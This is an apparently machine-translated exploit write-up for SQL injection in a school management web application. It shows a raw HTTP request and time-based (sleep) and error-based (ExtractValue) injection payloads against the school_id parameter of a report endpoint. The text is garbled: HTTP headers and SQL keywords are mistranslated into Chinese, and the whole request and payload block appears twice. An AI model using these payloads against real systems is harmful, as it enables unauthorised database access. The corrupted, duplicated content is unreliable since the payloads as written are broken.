#利用标题:全球- 多学校管理系统Express V1.0- SQL注入
#日期: 2023-08-12
#利用作者: ahmetümitBayram
#vendor: https://codecanyon.net/item/global-multi-school-management-management-system-express/21975378
#在: Kali Linux MacOS上测试
#CVE: N/A。
### 要求###
发布/报告/余额http/1.1
content-type:多部分/form-data;边界=----------- YWJKMTQZNDCW
ACCEPT: /
X-重新要求- WITH: XMLHTTPREQUEST
Referer: http://localhost
Cookie: GMSM=B8D36491F08934AC621B6BC7170EAEF18290469F
内容长度: 472
Accept-incoding: Gzip,Deflate,br
用户代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36
(Khtml,像壁虎一样)Chrome/108.0.0.0 Safari/537.36
HOST: LOCALHOST
Connection:保持空白
----------------YWJkMTQzNDcw
content-disposition: form-data;名称='school_id'
0'xor(if(now()()=sysdate(),sleep(6),0))xor'z
----------------YWJkMTQzNDcw
content-disposition: form-data;名称='Academic_Year_id'
----------------YWJkMTQzNDcw
content-disposition: form-data;名称='group_by'
----------------YWJkMTQzNDcw
content-disposition: form-data;名称='date_from'
----------------YWJkMTQzNDcw
content-disposition: form-data;名称='date_to'
---------------------------------------------------------------------------------
###参数有效载荷###
参数: Multipart School_id(((自定义)帖子))
type:基于错误的
title: mysql=5.1和基于错误的- 在哪里,在哪里,订购或组。
条款(extractValue)
Payload: ---------------------YWJkMTQzNDcw
content-disposition: form-data;名称='school_id'
0'xor(if(now()=sysdate(),sleep(6),0))xor'z'and
ExtractValue(1586,Concat(0x5c,0x71766b6b71,(select
(ELT(1586=1586,1))),0x716a627071)和'dyjx'='dyjx
----------------YWJkMTQzNDcw
content-disposition: form-data;名称='Academic_Year_id'
----------------YWJkMTQzNDcw
content-disposition: form-data;名称='group_by'
----------------YWJkMTQzNDcw
content-disposition: form-data;名称='date_from'
----------------YWJkMTQzNDcw
content-disposition: form-data;名称='date_to'
-------------------------------------------------------------------------------------------------
#日期: 2023-08-12
#利用作者: ahmetümitBayram
#vendor: https://codecanyon.net/item/global-multi-school-management-management-system-express/21975378
#在: Kali Linux MacOS上测试
#CVE: N/A。
### 要求###
发布/报告/余额http/1.1
content-type:多部分/form-data;边界=----------- YWJKMTQZNDCW
ACCEPT: /
X-重新要求- WITH: XMLHTTPREQUEST
Referer: http://localhost
Cookie: GMSM=B8D36491F08934AC621B6BC7170EAEF18290469F
内容长度: 472
Accept-incoding: Gzip,Deflate,br
用户代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36
(Khtml,像壁虎一样)Chrome/108.0.0.0 Safari/537.36
HOST: LOCALHOST
Connection:保持空白
----------------YWJkMTQzNDcw
content-disposition: form-data;名称='school_id'
0'xor(if(now()()=sysdate(),sleep(6),0))xor'z
----------------YWJkMTQzNDcw
content-disposition: form-data;名称='Academic_Year_id'
----------------YWJkMTQzNDcw
content-disposition: form-data;名称='group_by'
----------------YWJkMTQzNDcw
content-disposition: form-data;名称='date_from'
----------------YWJkMTQzNDcw
content-disposition: form-data;名称='date_to'
---------------------------------------------------------------------------------
###参数有效载荷###
参数: Multipart School_id(((自定义)帖子))
type:基于错误的
title: mysql=5.1和基于错误的- 在哪里,在哪里,订购或组。
条款(extractValue)
Payload: ---------------------YWJkMTQzNDcw
content-disposition: form-data;名称='school_id'
0'xor(if(now()=sysdate(),sleep(6),0))xor'z'and
ExtractValue(1586,Concat(0x5c,0x71766b6b71,(select
(ELT(1586=1586,1))),0x716a627071)和'dyjx'='dyjx
----------------YWJkMTQzNDcw
content-disposition: form-data;名称='Academic_Year_id'
----------------YWJkMTQzNDcw
content-disposition: form-data;名称='group_by'
----------------YWJkMTQzNDcw
content-disposition: form-data;名称='date_from'
----------------YWJkMTQzNDcw
content-disposition: form-data;名称='date_to'
-------------------------------------------------------------------------------------------------